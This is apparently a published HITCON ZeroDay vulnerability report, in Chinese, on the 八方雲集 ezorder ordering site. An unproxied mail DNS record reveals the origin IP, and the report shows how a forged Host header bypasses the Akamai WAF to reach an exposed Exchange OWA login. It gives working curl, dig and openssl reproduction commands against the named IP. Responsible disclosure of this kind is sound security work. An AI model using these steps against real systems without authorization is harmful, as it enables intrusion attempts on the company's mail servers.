Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2026-00539
- Vendor: 八方雲集食品有限公司
- Title: 八方雲集 ezorder 線上訂餐系統 Origin IP 洩露導致 Akamai WAF 完全繞過,暴露 Exchange OWA
- Introduction: *.*.com.tw 因 mail 子網域 DNS 洩露 Origin Server 真實 IP,攻擊者可偽造 Host header 繞過 Akamai WAF,直接訪問後端 Microsoft Exchange OWA 登入介面。
- 感謝函
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
已修補
-
未複測
-
公開
處理歷程
- 2026/04/14 23:04:14 : 新提交 (由 Win 更新此狀態)
- 2026/04/14 23:19:20 : 新提交 (由 Win 更新此狀態)
- 2026/04/14 23:20:35 : 新提交 (由 Win 更新此狀態)
- 2026/04/14 23:20:52 : 新提交 (由 Win 更新此狀態)
- 2026/04/16 14:21:43 : 新提交 (由 Win 更新此狀態)
- 2026/04/20 22:09:06 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/05/20 15:02:05 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/05/20 15:02:05 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/05/20 15:02:05 : 修補中 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2026/06/12 13:00:14 : 已修補 (由 組織帳號 更新此狀態)
- 2026/06/14 03:00:10 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2026-00539
- 通報者:jason1222 (Win)
- 風險:中
- 類型:資訊洩漏 (Information Leakage)
參考資料
OWASP 漏洞說明 (Top 10 2017 - A3 Sensitive Data Exposure)
https://www.owasp.org/index.php/Top_10-2017_A3-Sensitive_Data_Exposure
CWE-200 漏洞說明
https://cwe.mitre.org/data/definitions/200.html
相關網址
https://mail.8way.com.tw/
https://211.72.138.205/
https://211.72.138.205/owa/
https://211.72.138.205/owa/auth/logon.aspx
敘述
八方雲集旗下 ezorder.8way.com.tw 線上訂餐系統使用 Akamai CDN/WAF 作為前端防護
(CNAME 指向 ezorder.8way.com.tw.edgesuite.net → a2022.dscb.akamai.net),
未經授權的訪問會被 Akamai 回傳 HTTP 403 Access Denied,表面上看起來受 WAF 保護。
然而 mail.8way.com.tw 的 DNS A 記錄並未走 CDN,直接指向真實 Origin Server IP 211.72.138.205,
導致任何人都可以透過簡單的 DNS 查詢取得真實伺服器位址。
更嚴重的是,透過偽造 Host: ezorder.8way.com.tw 請求標頭直接連線至 Origin IP,
可以完全繞過 Akamai WAF 的所有防護機制。經驗證,該 Origin Server 同時運行 Microsoft Exchange Server,
且直接對外暴露 Outlook Web App (OWA) 登入介面,屬於高風險設定錯誤(Misconfiguration)。
並透過 SSL 憑證交叉驗證,確認 211.72.138.205 為八方雲集國際股份有限公司
(BAFANG YUNJI INTERNATIONAL CO., LTD.)正式擁有的 Origin Server。
重現步驟
Step 1:確認 ezorder 站台受 Akamai WAF 保護
執行 curl -I https://ezorder.8way.com.tw/,伺服器回傳 HTTP 403,
回應標頭中的 server-timing: ak_p 與 akamai-grn 確認此站台由 Akamai Edge 提供服務。
$ curl -I https://ezorder.8way.com.tw/
HTTP/2 403
server-timing: ak_p; desc="1776177944358_3410332387_685793583_21_6825_1_13_15"
akamai-grn: 0.e38a45cb.1776177944.2b65ece7
Step 2:透過 DNS 查詢取得真實 Origin IP
執行 dig mail.8way.com.tw A,發現 mail 子網域並未經過 CDN,
直接回傳真實 Origin Server IP 211.72.138.205。
$ dig mail.8way.com.tw A
;; ANSWER SECTION:
mail.8way.com.tw. 2252 IN A 211.72.138.205
對比 ezorder 主網域的 DNS 解析,可以看出 ezorder 是走 Akamai、mail 是直連 Origin 的差異:
$ dig ezorder.8way.com.tw
ezorder.8way.com.tw. CNAME ezorder.8way.com.tw.edgesuite.net.
ezorder.8way.com.tw.edgesuite.net. CNAME a2022.dscb.akamai.net.
Step 3:偽造 Host Header 直接訪問 Origin IP,成功繞過 Akamai WAF
執行 curl -I https://211.72.138.205/ -H "Host: ezorder.8way.com.tw" --insecure,
Origin Server 直接回應 HTTP 302 Redirect 至 /owa/,證實 Akamai WAF 被完全繞過。
$ curl -I https://211.72.138.205/ -H "Host: ezorder.8way.com.tw" --insecure
HTTP/2 302
cache-control: no-cache
pragma: no-cache
content-length: 0
location: https://ezorder.8way.com.tw/owa/
server: Microsoft-IIS/10.0
x-feserver: EX02
x-requestid: b6642188-9fa5-4708-9756-a33c1130d056
同時這個回應也洩露了下列敏感資訊:
- 伺服器軟體版本:
Microsoft-IIS/10.0 - 內部主機名稱:
EX02(Exchange Frontend Server 編號) -
應用框架:
ASP.NETStep 4:透過 SSL 憑證交叉驗證 Origin 身分
為了確認
211.72.138.205確實是八方雲集的真實 Origin Server(而非中間代理或其他企業的伺服器),
檢查該 IP 的 SSL 憑證:$ echo | openssl s_client -connect 211.72.138.205:443 -servername ezorder.8way.com.tw 2>/dev/null
| openssl x509 -noout -text | grep -E "Subject:|DNS:|Issuer:"Issuer: C=TW, O=TAIWAN-CA, CN=TWCA Secure SSL Certification Authority
Subject: C=TW, ST=Taiwan, L=New Taipei, O=BAFANG YUNJI INTERNATIONAL CO., LTD., CN=.8way.com.tw
DNS:.8way.com.tw, DNS:8way.com.tw憑證資訊完全確認:
- Organization:
BAFANG YUNJI INTERNATIONAL CO., LTD.(八方雲集國際股份有限公司) - CN:
*.8way.com.tw(wildcard 憑證) - SAN:
*.8way.com.tw,8way.com.tw -
簽發者:TWCA(台灣網路認證)
此憑證直接由八方雲集公司名義向 TWCA 申請,證明
211.72.138.205為八方雲集正式的 Origin Server,
非代理、非 CDN 節點。Step 5:確認 Outlook Web App 登入介面可直接存取
瀏覽器開啟下列網址,可直接看到 Microsoft Outlook Web App 的登入頁面,
此端點完全未受 Akamai WAF 保護,任何攻擊者都可以直接對其進行互動:透過 curl 進一步驗證:
$ curl -I https://211.72.138.205/owa/ --insecure
HTTP/2 440
server: Microsoft-IIS/10.0
x-powered-by: ASP.NET
x-feserver: EX02HTTP 狀態碼
440為 Microsoft IIS 特有,代表 Login Timeout,證實 OWA 應用正常運作並等待登入。